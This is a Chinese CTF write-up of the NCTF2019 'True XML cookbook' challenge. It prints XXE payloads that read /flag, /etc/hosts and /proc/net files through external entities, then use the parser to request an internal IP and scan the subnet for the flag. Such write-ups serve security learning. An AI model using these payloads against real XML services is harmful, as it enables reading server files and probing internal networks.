[NCTF2019]True XML cookbook-1|XXE漏洞
2024-08-28 16:41:12
1、打开题目之后和做的上一道:https://www.cnblogs.com/upfine/p/16534940.html题目界面一样,查看源代码等未发现有用信息,界面如下:
2、那就先按原来那道题的payload进行测试,payload和结果如下:
payload:
<?xml version="1.0" ?>
<!DOCTYPE llw [
<!ENTITY file SYSTEM "file:///flag">
]>
<user>
<username>&file;</username>
<password>1</password>
</user>
结果:
3、未成功获取到flag信息,那就探测内网信息,读取下系统内的配置文件信息看是否能发现有用的信息,包含:/etc/hosts、/proc/net/arp、proc/net/fib_trie等,最终在proc/net/fib_trie发现一个新的ip:10.244.80.202,结果如下:
payload:
<?xml version="1.0" ?>
<!DOCTYPE llw [
<!ENTITY file SYSTEM "file:////etc/hosts">
]>
<user>
<username>&file;</username>
<password>1</password>
</user>
在执行/proc/net/arp会出现两个新的地址,但是其中一个新的地址有时候有,有时候又没有,不知道为什么,看下面中间两张图,但是也对这两个地址按后面的爆破方式进行了爆破,但是未成功。
4、这里获得一个新的地址,尝试下进行连接结果如下:
payload
<?xml version="1.0" ?>
<!DOCTYPE llw [
<!ENTITY file SYSTEM "http://10.244.80.202/">
]>
<user>
<username>&file;</username>
<password>1</password>
</user>
5、连接失败,那就查询下同网段内存在不存在其他地址,使用bp的爆破模块进行爆破,设置如下:
6、等待爆破结果,最终成功获得flag,爆破的结果可能会比较慢,需要等待下,最终结果如下:
最新文章
- Ajax技术使用
- Windows Squid 安装配置
- ①创建项目testpackage ②在pack2.B中添加方法f ③在类A中添加如下三个成员变量:int型的私有变量i float型的变量f double型的公有变量d 在pack1.B的main方法中为对象a的成员变量f和d分别赋值为2和3 在pack2.C的main方法中为对象a的成员变量d赋值为3
- Server Tomcat v7.0 Server at localhost failed to start解决办法
- ";大账户";时代
- golang的{}初始化
- Tuple元祖
- Objective-C命名编写规范
- maven使用之烦人的.lastUpdated文件
- android 瀑布流(图片浏览)
- Json.Net系列教程 3.Json.Net序列化和反序列化设置
- 使用SLT 工具从SAP导入数据到SAP HANA的监控
- 【Visual C++】游戏编程学习笔记之二:定时器的使用
- LeetCode(26)-Binary Tree Level Order Traversal II
- 【杂谈】Tomcat 之 Lifecycle接口
- Django的model form组件
- react学习笔记2之正确使用状态
- 基于form表单 写登陆注册
- PC平台在Unity3D中播放硬盘ogg,mp3,wav文件
- 时钟中断TIMER_BH(bottom_half)实现分析